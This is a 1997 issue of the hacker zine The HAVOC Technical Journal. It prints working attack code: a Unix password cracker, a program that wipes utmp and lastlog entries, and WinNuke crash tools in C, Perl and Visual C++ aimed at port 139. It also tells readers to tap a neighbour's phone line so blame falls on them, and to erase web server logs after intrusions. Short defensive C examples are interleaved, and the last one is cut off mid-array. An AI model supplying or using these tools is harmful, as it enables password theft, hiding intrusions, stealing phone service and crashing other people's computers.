
The Havoc Technical Journal 11

  

=====================================================================
                    The HAVOC Technical Journal
=====================================================================

Vol. 1 | No.11 | June 1st, 1997 | A HAVOC Bell Systems Publication

HAPPY ANNIVERSARY TO THTJ! 1 YEAR AND GOING STRONG! WOO HOO!
_____________________________________________________________________________

-[The HAVOC Technical Journal Issue 11]-
Editorial..............................Scud-O
crack-passwd.c ........................Scud-O
Getting away scott free................The Banshee
Winnuke Info & Code....................Snapple
REality's Digital Dictionary...........REality
Generate.pas ..........................Scud-O
Back Door to MicroType.................WeatherM
Mobile Phreaking.......................phear.
Java Mail Forging & Bombing............Scud-O
Line Man Impersonation.................phear.
Securities Hole in cgi-bin.............memor
The History of Caffeine................Scud-O
Untitled...............................It's a secret
Looking Back, a year later.............Scud-O
The News...............................KungFuFox
Phonecalls.............................THTJ

-------------------------------------------------
[WE HAVE MOVED]
Hell, most of you probably already know this, but thanks to JP we are
now at: http://www.antionline.com/hbs/

[ArcAngl Joins HBS]
Yes, yet another #phreak brother has joined up with HBS. Arc is one
cool mofo, and he knows his shit. He lives kinda near Scud-O, so watch for
hilarious anecdotes coming from their stories of trashing, getting busted,
drinking, fast driving, etc. Note: Watch out for Acura Integras and Pontiac
Grand Prix LE's drag racing!
_____________________________________________________________
[ Soul Coughing FUCKING OWNS! ]
Well, the HFStival at RFK Stadium in Washington DC took place on
May 31st, and i would like to thank Soul Coughing for letting me hang with
them. YOU GUYS FUCKING OWN! If you have never heard any of Soul Coughing's
music, go run ( not walk ) to a store and buy "Irresistible Bliss" their
newest CD, or pick up some of the older CDs. Also, if you have the X-Files CD
Soundtrack, pop it in and play song number 2, 'Unmarked Helicopters' and hear
Soul Coughing's wonderful music.
_____________________________________________________________

The HAVOC Technical Journal - Information
- Editor in Chief : Scud-O, FoxMulder@worldnet.att.net
- Assistant Editor : KungFuFox, mazer@cycat.com
- Submissions Editor: Keystroke, keystroke@thepentagon.com
- THTJ email address: thtj@juno.com
- THTJ website: http://www.antionline.com/hbs/
- THTJ mailing address: PO BOX 448 Sykesville, MD 21784

The HAVOC Technical Journal Vol. 1, No.11, June 1st, 1997.
A HAVOC Bell Systems Publication. Contents Copyright (©)
1997 HAVOC Bell Systems Publishing. All Rights Reserved.
No part of this publication may be reproduced in whole or
in part without the expressed written consent of HAVOC
Bell Systems Publishing. [No copying THTJ, damnit.]

The HAVOC Technical Journal does in no way endorse the
illicit use of computers, computer networks, and
telecommunications networks, nor is it to be held liable
for any adverse results of pursuing such activities.
[Actually, to tell you the honest to goodness truth, we
do endorse that stuff. We just don't wanna get in trouble
if you try it for yourself and something goes wrong.]


For information about using articles published in THTJ, send mail to:
e-mail: thtj@juno.com
mail: THTJ
c/o HBS
PO Box 448
Sykesville, MD 21784
_____________________________________________________________
[Editorial : by Scud-O] Money..........

Money, get away
Get a good job with more pay and you're O.K.
Money it's a gas
Grab that cash with both hands and make a stash
New car, caviar, four star daydream,
Think I'll buy me a football team

Money get back
I'm alright Jack keep your hands off my stack.
Money it's a hit
Don't give me that do goody good bullshit
I'm in the hi-fidelity first class travelling set
And I think I need a Lear jet

Money it's a crime
Share is fairly, but don't take a slice of my pie
Money so they say
Is the root of all evil today
But if you ask for a rise it's no surprise that they're
giving none away.

- 'Money' by Pink Floyd from 'Dark Side of the Moon'
Lyrics by Roger Waters.

This month, i am going to have a little chat with you on money. Why
you ask? Well, let me blurt it out. Earlier this month, while checking my mail
at the local Post Office, i was approached, and offered a buy out bid for
The HAVOC Technical Journal. Yes, that's right, someone wanted to buy this
very zine that you are reading. Shocked? Well, so was I, especially when i
read the 'contract'.

The 'Contract'
--------------

Ok, the person who approached me and offered me this money, the amount
of which ill get to in a minute, gave me this contract before heading out the
door.
It states that one, Scud-O aka __(My REAL Name would go here)___ is
to be paid $10,000 for The HAVOC Technical Journal, Any and all copyrights
held for THTJ, And my current computer.

Ok, now that sounds like a good deal but read on....

The restrictions on the editor and writing staff were as follows:

o I ( Scud-O) can never write or edit another zine, either in print,
or online, and as far as the rest of this document explained, it
looked like i could never work on a h/p zine, or even a NORMAL
zine like Time, Newsweek, etc.

o Any and all past writers can never write for another zine, either
in print or online. Now, this is just simply unenforceable, as i have
no control over the other writers. They will still continue to write
articles for many zines. I think this was added, so if i had violated
the contract that they could sue me, and at least be guaranteed the
10000 they paid me.


So, after reading this, well i threw out the contract. There is no way
that i am going to give up THTJ or my freedom to edit a zine, or even write
articles for them. Maybe some of you are saying, 'hey just use a different
nick' , well this would not work, since if they traced the zine to me, which
probably wouldn't be hard to do, they could sue me for breach of contract,
and sue my ass off.
In the end, i hope you liked the view i took, and decided to keep
THTJ.
Scud-O , Founder, and Editor in Chief of THTJ


Scud-O and HBS would like to hear your views on this issue.
Please feel free to e-mail us at: FoxMulder@worldnet.att.net

----------------------------------------------
/ ---/ --/ / / | /------/ / /
/--- /-----/------/-----/ / / /
/----------/ /--------/
-of HAVOC Bell Systems-

FoxMulder@worldnet.att.net | http://www.antionline.com/hbs/

_____________________________________________________________
[ No We are NOT Going to Stop ]
Earlier this month, I had mentioned to a few people that i was
thinking of giving up thtj. Well, this is false. I had looked into giving
up on the h/p scene in general, but after a few beers, i changed my mind, I
am going to keep this zine going.
I would like to thank JP for telling people that i was thinking of
giving up and stop publishing thtj. And a REAL big thanks to the hundreds of
you who sent me e-mail saying to keep up the good work on the zine. Thanks.
_____________________________________________________________
[ crack-passwd.c - A Password Cracker by Scud-O]

Ok, well, while this may not be the greatest cracker out there, this
has a variety of features, and does more cracking than other conventional
password crackers out there. This is for the UNIX platform, and i have no
intention of porting it to DOS, since well, i don't feel like porting crypt()
along with it.

/*******************************************************************
*
* crack-passwd.c - A Password Cracker by Scud-O for THTJ11.
*
* Usage: crack-passwd [-w wordlist]
*
* This is a fairly advanced cracker, first it gets the GECOS field, and
* modifies it, etc and tries it as the password. If this fails, then it goes
* to the wordlist that you specify, or to /usr/dict/words if you leave it
* blank.
*
* All comments to: Scud-O at <FoxMulder@worldnet.att.net>
*
* Improvements needed : a faster crypt() method would be nice, maybe ill
* try crypt(3), hmmmm. also a faster try() would be nice.
* Also: adding the joetest.c code could be nice, but it's not needed.
*********************************************************************/


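#include <ctype.h>
#include <stdio.h>
#include <stdlib.h> /* exit() */
#include <string.h> /* strlen(), strcmp(), strncpy() */
#include <unistd.h> /* crypt() on most UNIX systems */
#include <pwd.h>
#include <sys/param.h>
#include <sys/time.h>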

#define DEF_WORDLIST "/usr/dict/words"
#define MAXWORDS 32767
#define NW 64

int ndictwords = 0;

char *pname;
char *wordfile = DEF_WORDLIST;
char wordlist[MAXWORDS][9];

main(argc, argv)
int argc;
char **argv;
{
char * try();
register char *passwd;
register struct passwd *pw;

setlinebuf(stdout);
pname = *argv;

/* Process the arguments */
while (--argc)
{
if ( **++argv != '-')
/* Yuck, a goto! i should change this.... */
goto usage;

switch ( *++*argv)
{
case 'w':
if (--argc <= 0)
/* Again! */
goto usage;

wordfile = *++argv;
break;
default:
usage: fprintf(stderr, "Usage: %s [-w wordfile]\n", pname);
exit(1);

}
}

/* load up the wordlist */
load_wordlist();

/* For each password file line..... */
while((pw = getpwent()) != NULL)
{
/* Look at the encrypted password. If it's not 13 characters,
* the password is a fake value. ( or its, yuck encrypted) */


switch (strlen(pw->pw_passwd))
{
case 13:
/* Crack the biatch */
if (( passwd = try(pw)) != NULL)
{
printf("%s was cracked, password is %s\n",
pw->pw_name, passwd);
}

break;

case 0:
/* Error, an invalid password */
printf("Error - a zero length password : %s\n",
pw->pw_name);
break;

default:
break;
}
}
exit(0);
}

/****************************************
* try() - this function does the cracking
****************************************/


char *try(pw)
struct passwd *pw;
{
char *crypt();
char *words[NW];
register char *s;
static char buf[1024];
register int i, nwords;

/* Build a list of words - the login name, and words from GECOS */
words[0] = pw->pw_name;

nwords = 1;
s = pw->pw_gecos;

while (*s == ' ' || *s == '\t')
s++;

while (*s != ',' && *s != '\0' && nwords < NW)
{
while (*s == ' ' || *s == '\t')
*s++ = '\0';

words[nwords++] = s;

while ( *s != ' ' && *s != '\t' && *s != ',' && *s != '\0')
s++;
}

*s = '\0';

/* Ok, now lets try all those words in various permutations. */

for (i = 0; i < nwords; i++)
{
if (!strcmp(pw->pw_passwd, crypt(words[i], pw->pw_passwd)))
return(words[i]);
reverse(words[i], buf);

if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd)))
return(buf);
lower(words[i], buf);

if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd)))
return(buf);
reverse(buf, buf);

if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd)))
return(buf);
upper(words[i], buf);

if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd)))
return(buf);
reverse(buf, buf);

if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd)))
return(buf);
capital(words[i], buf);

if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd)))
return(buf);
reverse(buf, buf);

if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd)))
return(buf);
}

/* Ok, that didn't work, lets try the dictionary */

for (i = 0; i < ndictwords; i++)
{
if (!strcmp(pw->pw_passwd, crypt(wordlist[i], pw->pw_passwd)))
return(wordlist[i]);
reverse(wordlist[i], buf);

/* from here on test the transformed copy in buf, not the original word */
if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd)))
return(buf);
lower(wordlist[i], buf);

if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd)))
return(buf);
reverse(buf, buf);

if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd)))
return(buf);
upper(wordlist[i], buf);

if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd)))
return(buf);
reverse(buf, buf);

if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd)))
return(buf);
capital(wordlist[i], buf);

if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd)))
return(buf);
reverse(buf, buf);

if (!strcmp(pw->pw_passwd, crypt(buf, pw->pw_passwd)))
return(buf);
}

return(NULL);
}

/* load_wordlist() - read the wordlist into memory. Pretty simple */
load_wordlist()
{
FILE *fp;
char word[BUFSIZ];

if ((fp = fopen(wordfile, "r")) == NULL)
{
fprintf(stderr, "%s: cannot open %s.\n", pname, wordfile);
exit(1);
}

while(ndictwords < MAXWORDS && fgets(word, BUFSIZ, fp) != NULL)
{
word[strlen(word)-1] = '\0'; /* strip the newline character */
strncpy(wordlist[ndictwords], word, 8);
wordlist[ndictwords++][8] = '\0';
}

fclose(fp);
}

/* lower() - convert (s) to lower case (t) */
lower(s,t)
register char *s, *t;
{
while(*s)
{
*t++ = isupper(*s) ? tolower(*s) : *s;
s++;
}
*t = '\0'; /* terminate the copy */
}

/* upper() - convert (s) to upper case (t) */
upper(s,t)
register char *s, *t;
{
while(*s)
{
*t++ = islower(*s) ? toupper(*s) : *s;
s++;
}
*t = '\0'; /* terminate the copy */
}

/* capital() - capitalize (s) and store it (t): first letter upper, rest lower */
capital(s,t)
register char *s, *t;
{
if (*s)
{
*t++ = islower(*s) ? toupper(*s) : *s;
s++;
}

while(*s)
{
*t++ = isupper(*s) ? tolower(*s) : *s;
s++;
}
*t = '\0'; /* terminate the copy */
}

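/* reverse() - reverse (s) and store it (t) */
reverse(s, t)
register char *s, *t;
{
register int i, n;
char tmp[1024];

n = strlen(s);
if (n >= (int)sizeof(tmp))
n = sizeof(tmp) - 1;

/* copy first, so that reverse(buf, buf) also works in place */
strncpy(tmp, s, n);
for (i = 0; i < n; i++)
t[i] = tmp[n - 1 - i];
t[n] = '\0';
}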
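
The same candidate list, seen from the defending side: a check a password-change routine can run to refuse any new password that crack-passwd.c would find in its first pass (login name and GECOS words, plain, lower, upper, capitalised, each also reversed). This is an added example, not part of the original article; the function names and the sample account are made up, and the 8-character comparison assumes traditional DES crypt(), which only looks at the first eight characters.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAXLEN      64
#define SIGNIFICANT 8   /* assumption: DES crypt() ignores anything past 8 chars */

/* Copy src to dst with one case rule: 'l' lower, 'u' upper,
 * 'c' Capitalised, anything else unchanged. */
static void transform(const char *src, char *dst, char mode)
{
    size_t i, n = strlen(src);

    if (n >= MAXLEN)
        n = MAXLEN - 1;
    for (i = 0; i < n; i++) {
        unsigned char ch = (unsigned char)src[i];
        if (mode == 'l' || (mode == 'c' && i > 0))
            dst[i] = (char)tolower(ch);
        else if (mode == 'u' || (mode == 'c' && i == 0))
            dst[i] = (char)toupper(ch);
        else
            dst[i] = (char)ch;
    }
    dst[n] = '\0';
}

static void reverse_copy(const char *src, char *dst)
{
    size_t i, n = strlen(src);

    for (i = 0; i < n; i++)
        dst[i] = src[n - 1 - i];
    dst[n] = '\0';
}

/* 1 if candidate equals word in any of the eight variants the cracker tries. */
static int matches_variant(const char *candidate, const char *word)
{
    static const char modes[] = { 'n', 'l', 'u', 'c' };
    char fwd[MAXLEN], rev[MAXLEN];
    size_t m;

    if (*word == '\0')
        return 0;
    for (m = 0; m < sizeof(modes); m++) {
        transform(word, fwd, modes[m]);
        reverse_copy(fwd, rev);
        if (strncmp(candidate, fwd, SIGNIFICANT) == 0 ||
            strncmp(candidate, rev, SIGNIFICANT) == 0)
            return 1;
    }
    return 0;
}

/* 1 if the proposed password is derivable from the login name or from the
 * GECOS words before the first comma (the same fields try() walks). */
int is_guessable(const char *candidate, const char *login, const char *gecos)
{
    char copy[256], *tok;
    size_t n;

    if (matches_variant(candidate, login))
        return 1;

    n = strcspn(gecos, ",");
    if (n >= sizeof(copy))
        n = sizeof(copy) - 1;
    memcpy(copy, gecos, n);
    copy[n] = '\0';

    for (tok = strtok(copy, " \t"); tok != NULL; tok = strtok(NULL, " \t"))
        if (matches_variant(candidate, tok))
            return 1;
    return 0;
}

int main(void)
{
    /* constructed sample account, not taken from any real system */
    const char *login = "tanderson";
    const char *gecos = "Thomas Anderson,Room 101,555-0100";
    const char *tries[] = { "nosredna", "THOMAS", "tanderso99", "correct-horse" };
    size_t i;

    for (i = 0; i < sizeof(tries) / sizeof(tries[0]); i++)
        printf("%-14s %s\n", tries[i],
               is_guessable(tries[i], login, gecos) ? "REJECT" : "ok");
    return 0;
}
```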

_____________________________________________________________

************************* | If you dont like it then eat me cuz its free
Getting away scott free. | information and you should be trying to get
by The Banshee | as much as that as you can before we all
This was written for THTJ | blow up and die a terrible horrible death
cuz the zine is the bomb | cuz big brother is watching..
************************* | BE PARANOID!

Everyday you see some dumbass wanna be hacker getting arrested, suspended
from school, kicked out of the house, getting raided by the feds for the
stupid ass reason that the dumb fucker doesn't know how to edit log files!
In this text I am going to explain the various log files, and where to find
them and how to edit and replace them, using either your greatest hacking
tool yet, that being pico, or use one of the log editor programs.

In this day and age, people use the internet as a good way to access other
computers. Good idea, but you are also more susceptible to log files. When
you gain root on a dial up there are no log files to be dealt with. The only
true worry is that someone will trace your number back to the original caller,
but that is easily bypassed by simply not doing it from your house. Here is
a simple plan for using your neighbor's phone line to do your deeds (I am lucky
for I have a kid next door who tells everyone he's a hacker so if I ever get
caught it's him who gets the blame).

Ok here we go, in most rural or suburban
neighborhoods there are little gray boxes on the sides of the houses, which
are locked by a simple screw that you can unscrew in a matter of seconds.
This little gray box contains usually two phone lines that lead up into
the house. If the person has two phone lines then the two jacks will be two
different lines, if they have one phone line then both jacks will be the same
line. Ok, if the person has only one phone line you are good to go. (Make
sure you do this at night or when your neighbors are away on vacation) Dig
a small ditch from your neighbor's gray box to your house's nearest window,
then get some long phone cords (Usually found at radio shack) and run it from
the gray box to your nearest phone in your house. Cover up the ditch and you
got yourself a nice phone line to do what you like.

But what if the house has two phone lines and you can't disconnect one of
their lines just for you to use, you may ask. That is right, that's just
screamin for yourself to get caught, so here's what you do!

Go to radio shack and pick up a splitter they kinda look like this
||
---
/ \
|_____|
I know that's a real lame depiction of the splitter itself, but uhm what
it does is you can split one line into two lines. So do the same as the one
liner and dig a ditch etc etc, but put the splitter in and lead one line
into your neighbor's house and the other to your house, so no suspicion when
they use their second phone line and they have no dial tone. Also I suggest
you do all your callin on their phone line when they are not home, and don't
try to listen in on their phone calls cuz each time you pick up the phone
there's a really loud click that the other party can hear. Use it just for
doing the stuff you wouldn't dare using your phone line to do.
So when the cops start pullin up, you don't have to worry, it's all next door.

Now on to unix, and linux. When you do anything on a linux server, you are
logged. The three main log files you really should worry about are 'lastlog',
'UTMP', and 'WTMP'. The only way to edit these files is if you have root
cuz only root owns these files. Here's a brief description of the 3 important
log files.

LastLog - Where the last login came from.
WTMP - every log on and off, with login and logout time plus tty and host.
UTMP - Who is currently logged in on the server.

Here's where they can be found on various operating systems.
Usually in linux you can find all the log files in /usr/var/adm

LastLog UTMP WTMP | If one of them is in one of those
------- ------ ------ | directories, all the rest tend to be in
/usr/var/adm /etc /etc | the same directories. And dont forget
/usr/adm /var/adm /var/adm | if you used the famed phf exploit
/var/adm /usr/var /usr/var | to get your password file that you
/var/log /usr/adm /usr/adm | cracked, dont forget to erase everything
/var/log /var/log | in the /httpd/logs file, in which a lot
| of hackers neglect to do!

Things not to do
----------------
Never, ever, ever, ever totally delete the log files for the fact that
root then knows that there was a hacker in the midst of his system.

Don't go into /etc/motd and change the motd. That's the first thing most lame
fuckers do, and that's just another way of screaming 'A HACKER WAS HERE!'
(Why is it when someone actually gets into a system they feel compelled to
tell someone that they were there?)

Don't put in suid root shells anywhere, you're better off compiling a backdoor
so you can access it anytime without being noticed by commands like user or
finger..

Don't hack the webpage the server is using, unless you have a pretty damn good
reason to do it and not just to show off to your friends and to try to be
cool

Some codes to help you along the way
------------------------------------
Marry.c is a great program for editing log files. Lots of flags to play with
and over all it's a great fucking program to use to edit and spoof logs.
You can get the source readily at most sites that offer "hacking" codes. I'm
sure a lot of people can back me up in saying this is one of the best.
(http://www.rootshell.com is one of the places you can get it)

This next program basically just erases yourself from all the logs, it's simple
but it also screams to the sysadmin that there was a hacker present in the
machine

#include <fcntl.h>
#include <utmp.h>
#include <sys/types.h>
#include <unistd.h>
#include <lastlog.h>

main(argc, argv)
int argc;
char *argv[];
{
char *name;
struct utmp u;
struct lastlog l;
int fd;
int i = 0;
int done = 0;
int size;

if (argc != 1) {
if (argc >= 1 && strcmp(argv[1], "cloakme") == 0) {
printf("You are now cloaked\n");
goto start;
}
else {
printf("close successful\n");
exit(0);
}
}
else {
printf("usage: close [file to close]\n");
exit(1);
}
start:
name = (char *)(ttyname(0)+5);
size = sizeof(struct utmp);

fd = open("/etc/utmp", O_RDWR);
if (fd < 0)
perror("/etc/utmp");
else {
while ((read(fd, &u, size) == size) && !done) {
if (!strcmp(u.ut_line, name)) {
done = 1;
memset(&u, 0, size);
lseek(fd, -1*size, SEEK_CUR);
write(fd, &u, size);
close(fd);
}
}
}


size = sizeof(struct lastlog);
fd = open("/var/adm/lastlog", O_RDWR);
if (fd < 0)
perror("/var/adm/lastlog");
else {
lseek(fd, size*getuid(), SEEK_SET);
read(fd, &l, size);
l.ll_time = 0;
strncpy(l.ll_line, "ttyq2 ", 5);
gethostname(l.ll_host, 16);
lseek(fd, size*getuid(), SEEK_SET);
close(fd);
}
}


Now as a concluding paragraph I've decided to show you why you should be
paranoid as shit.

The first and only time I was busted wasn't because I neglected to
erase log files, or I told everyone about my doings, it was because there
was a large suspicion that I was an alleged "hacker". So because of this
I was not only kicked out of college, I also found out that I was being
watched for 3 weeks including undercover bitches posing as my classmates
to try to rip out info on me. You can call this discrimination, biased
thoughts, or whatever you want, but the fact is, no one even likes the term
hacker, the simple word brings up thoughts of some punk teen giving other
people viruses. Much like marijuana legalization, gay rights, abortion,
racism, hacking is a very very touchy subject that our government likes
to brush under the carpet and try to just forget it. But it's there, and
the hackers like codezero (hacking amnesty international) are giving
the real hackers a bad name, givin the term hacker even more of a
discriminatory meaning. What I'm trying to say here is, be paranoid, don't
talk shit, and look after your own ass.
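
Why the eraser above "screams to the sysadmin": its memset() leaves a record of nothing but zero bytes in the middle of the login accounting file, and that is easy to look for. The scanner below is an added example, not part of the original article; it assumes the platform's `struct utmp` from `<utmp.h>`, the sample records are constructed, and an all-zero record is treated as a heuristic that warrants a closer look rather than as proof.

```c
#include <stdio.h>
#include <string.h>
#include <utmp.h>

/* Count records in buf that consist only of zero bytes.
 * *first receives the index of the first such record, or -1. */
size_t count_zeroed_records(const unsigned char *buf, size_t len, long *first)
{
    static const unsigned char zero[sizeof(struct utmp)]; /* all zeroes */
    size_t i, nrec = len / sizeof(struct utmp), hits = 0;

    *first = -1;
    for (i = 0; i < nrec; i++) {
        if (memcmp(buf + i * sizeof(struct utmp), zero, sizeof(zero)) == 0) {
            if (*first < 0)
                *first = (long)i;
            hits++;
        }
    }
    return hits;
}

/* Scan a utmp/wtmp style file record by record.
 * Returns the number of zeroed records, or -1 if the file cannot be read. */
long scan_file(const char *path)
{
    unsigned char rec[sizeof(struct utmp)];
    long first, hits = 0, idx = 0;
    FILE *fp = fopen(path, "rb");

    if (fp == NULL)
        return -1;
    while (fread(rec, 1, sizeof(rec), fp) == sizeof(rec)) {
        if (count_zeroed_records(rec, sizeof(rec), &first) > 0) {
            printf("%s: record %ld is all zeroes\n", path, idx);
            hits++;
        }
        idx++;
    }
    fclose(fp);
    return hits;
}

static void make_login(struct utmp *u, const char *line, const char *user)
{
    memset(u, 0, sizeof(*u));
    u->ut_type = USER_PROCESS;
    strncpy(u->ut_line, line, sizeof(u->ut_line) - 1);
    strncpy(u->ut_user, user, sizeof(u->ut_user) - 1);
}

/* Constructed sample: three logins; with wiped != 0 the middle record is
 * overwritten the way the article's memset() does it.
 * out must hold 3 * sizeof(struct utmp) bytes. */
size_t build_sample(unsigned char *out, int wiped)
{
    struct utmp u[3];

    make_login(&u[0], "tty1", "alice");
    make_login(&u[1], "ttyp0", "bob");
    make_login(&u[2], "ttyp1", "carol");
    if (wiped)
        memset(&u[1], 0, sizeof(u[1]));
    memcpy(out, u, sizeof(u));
    return sizeof(u);
}

int main(int argc, char *argv[])
{
    unsigned char buf[3 * sizeof(struct utmp)];
    long first;
    size_t n, hits;

    if (argc == 2) {                 /* scan a real file given on the command line */
        long r = scan_file(argv[1]);
        if (r < 0)
            perror(argv[1]);
        return r == 0 ? 0 : 1;
    }
    n = build_sample(buf, 1);        /* otherwise run on the constructed sample */
    hits = count_zeroed_records(buf, n, &first);
    printf("sample: %lu zeroed record(s), first at index %ld\n",
           (unsigned long)hits, first);
    return 0;
}
```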



_____________________________________________________________

Editor's note: Well it seems that some people do read directions and send in
their articles to our submissions editor, keystroke. Thanks to key for passing
this along and to Snapple for writing it. This is a popular topic these days,
so have fun using the code you all.

WinNuke Pack 1.0 by Snapple(root@techie.com)
============================================

Another sloppy piece of Microsoft coding.

It is possible to remotely cause denial of service to any of the operating systems listed below
by sending Out of Bounds data to NetBios, port 139. The user's carrier will drop and cause
Windows to execute a general protection fault (crash). Obviously you will need an ip address
and the target machine will also need an ip address (ie: inet connection).

Systems that are affected are:
- Windows 3.11
- Windows 95
- Windows NT 3.51
- Windows NT 4.0

What the pack contains
======================

- winnuke ansi c source code (linux, bsd, sunos)*
- perl script version of winnuke.*
- Visual C++ version of winnuke (MsWindows platforms).*
- Win95 winnuke binary(winnu95.zip).
- Mac winnuke source (winnuke-10-source.hqx).
- Mac winnuke binary. (WinNuke_1_0_FAT.sit).

* code inserted into article below.

Some Final Words
================
"Download and apply the patches and perhaps you're safe for the next few weeks.
That is, until the next Microsoft bug surfaces.... This will go on forever. Are you
getting sick and tired of this? Are you fed up with giving your money to Bill Gates -
already the richest man in the world - and getting all this crap in return? Then
perhaps you're ready for an alternative. Perhaps you're ready for Linux.

Linux is an exciting and powerful operating system with millions of happy users
world wide. It's the fastest growing operating system in existence. The brightest
minds of the computing world contribute to it. They don't do it for money, they do
it because they want the best system possible. "
(quoted)


Snapple.(root@techie.com)
=========================



Ansi C code. ( by _eci)
=======================
--- CUT HERE ---

/* winnuke.c - (05/07/97) By _eci */
/* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */


#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#define dport 139 /* Attack port: 139 is what we want */

int x, s;
char *str = "Bye"; /* Makes no diff */
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;


int open_sock(int sock, char *server, int port) {
struct sockaddr_in blah;
struct hostent *he;
bzero((char *)&blah,sizeof(blah));
blah.sin_family=AF_INET;
blah.sin_addr.s_addr=inet_addr(server);
blah.sin_port=htons(port);


if ((he = gethostbyname(server)) != NULL) {
bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
}
else {
if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
perror("gethostbyname()");
return(-3);
}
}

if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
perror("connect()");
close(sock);
return(-4);
}
printf("Connected to [%s:%d].\n",server,port);
return;
}


void main(int argc, char *argv[]) {

if (argc != 2) {
printf("Usage: %s <target>\n",argv[0]);
exit(0);
}

if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket()");
exit(-1);
}

open_sock(s,argv[1],dport);


printf("Sending crash... ");
send(s,str,strlen(str),MSG_OOB);
usleep(100000);
printf("Done!\n");
close(s);
}

--- CUT HERE ---






Perl script Winnuke (by Ghent)
========================
--- CUT HERE ---
#!/usr/bin/perl
# Ghent - ghent@bounty-hunters.com - Perl version of winnuke.c by _eci

use strict; use Socket;
my($h,$p,$in_addr,$proto,$addr);
$h = "$ARGV[0]"; $p = 139 if (!$ARGV[1]);
if (!$h) { print "A hostname must be provided. Ex: www.microsoft.com\n"; }
$in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname('tcp');
socket(S, AF_INET, SOCK_STREAM, $proto) or die $!;
connect(S,$addr) or die $!; select S; $| = 1; select STDOUT;
print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print "Nuked!\n"; close S;
--- CUT HERE ---



Windows Nt/95 winnuke source (by Eugene Surovegin)
==========================================
--- CUT HERE ---
// Windows NT port by Eugene Surovegin <ebs@glasnet.ru>
// Compiled with MS Visual C++ 4.2b, tested on NT 4.0 SP2

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <winsock.h>

#define dport 139 /* Attack port: 139 is what we want */

int open_sock(int sock, char *server, int port) {

struct sockaddr_in blah;
struct hostent *he;
int res;

memset((char *)&blah,0,sizeof(blah));
blah.sin_family=AF_INET;
blah.sin_addr.s_addr=inet_addr(server);
blah.sin_port=htons(port);

if ((he = gethostbyname(server)) != NULL)
memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length);
else
if ((blah.sin_addr.s_addr = inet_addr(server))==INADDR_NONE) {
puts("Cannot resolve host");
return(-3);
}

if (res=connect(sock,(struct sockaddr *)&blah,16)==-1) {
puts("Cannot connect socket");
return(-4);
}
printf("Connected to [%s:%d].\n",server,port);
return 0;
}


void main(int argc, char *argv[]) {

int s;
char *str = "Bye"; /* Makes no diff */
int port=0;

if ( (argc<2) || (argc>3)) {
printf("Usage: %s <target> [<port>]>\n",argv[0]);
exit(0);
}

if (argc==3) port=atoi(argv[2]);
if (!port) port=dport;

WSADATA wsaData;
if (!WSAStartup(MAKEWORD(1, 1), &wsaData)){
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP))!=INVALID_SOCKET) {
if (!open_sock(s,argv[1],port)){
puts("Sending crash... ");
send(s,str,strlen(str),MSG_OOB);
puts("Done!");
}
else printf("Error connecting to host %s",argv[1]);
closesocket(s);
}
else puts("Error getting socket");
WSACleanup();
}
else puts("Cannot init Winsock");
}

--- CUT HERE ---
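
On the wire, all three programs above produce the same thing: a TCP segment to port 139 with the URG flag set, which is how MSG_OOB data is carried. The check below is an added example, not part of the WinNuke pack; it is the test a packet filter or sensor can apply to a raw IPv4 packet, the function name is made up, and the sample packet is constructed (documentation addresses, checksums left at zero and not verified).

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NETBIOS_SSN_PORT 139   /* the port named in the article */
#define PROTO_TCP        6
#define TCP_FLAG_URG     0x20  /* set by the sender's stack when MSG_OOB is used */

/* Inspect one raw IPv4 packet.
 * Returns 1 for a TCP segment to port 139 with URG set,
 *         0 for any other well-formed packet,
 *        -1 if the packet is not IPv4 or is truncated. */
int is_oob_to_netbios(const uint8_t *pkt, size_t len)
{
    size_t ihl, thl;
    const uint8_t *tcp;
    unsigned dport, frag_off;

    if (len < 20 || (pkt[0] >> 4) != 4)
        return -1;
    ihl = (size_t)(pkt[0] & 0x0f) * 4;        /* IP header length in bytes */
    if (ihl < 20 || len < ihl)
        return -1;
    if (pkt[9] != PROTO_TCP)
        return 0;

    /* Only the first fragment carries the TCP header. */
    frag_off = ((unsigned)(pkt[6] & 0x1f) << 8) | pkt[7];
    if (frag_off != 0)
        return 0;

    if (len < ihl + 20)
        return -1;
    tcp = pkt + ihl;
    thl = (size_t)(tcp[12] >> 4) * 4;         /* TCP header length in bytes */
    if (thl < 20 || len < ihl + thl)
        return -1;

    dport = ((unsigned)tcp[2] << 8) | tcp[3];
    return dport == NETBIOS_SSN_PORT && (tcp[13] & TCP_FLAG_URG) != 0;
}

/* Constructed sample: 192.0.2.10:1024 -> 192.0.2.20:139, flags URG|PSH|ACK,
 * urgent pointer 3, payload "Bye" as in the C source above. */
static const uint8_t SAMPLE_OOB[43] = {
    /* IPv4 header */
    0x45, 0x00, 0x00, 0x2b, 0x00, 0x01, 0x40, 0x00,
    0x40, 0x06, 0x00, 0x00, 0xc0, 0x00, 0x02, 0x0a,
    0xc0, 0x00, 0x02, 0x14,
    /* TCP header */
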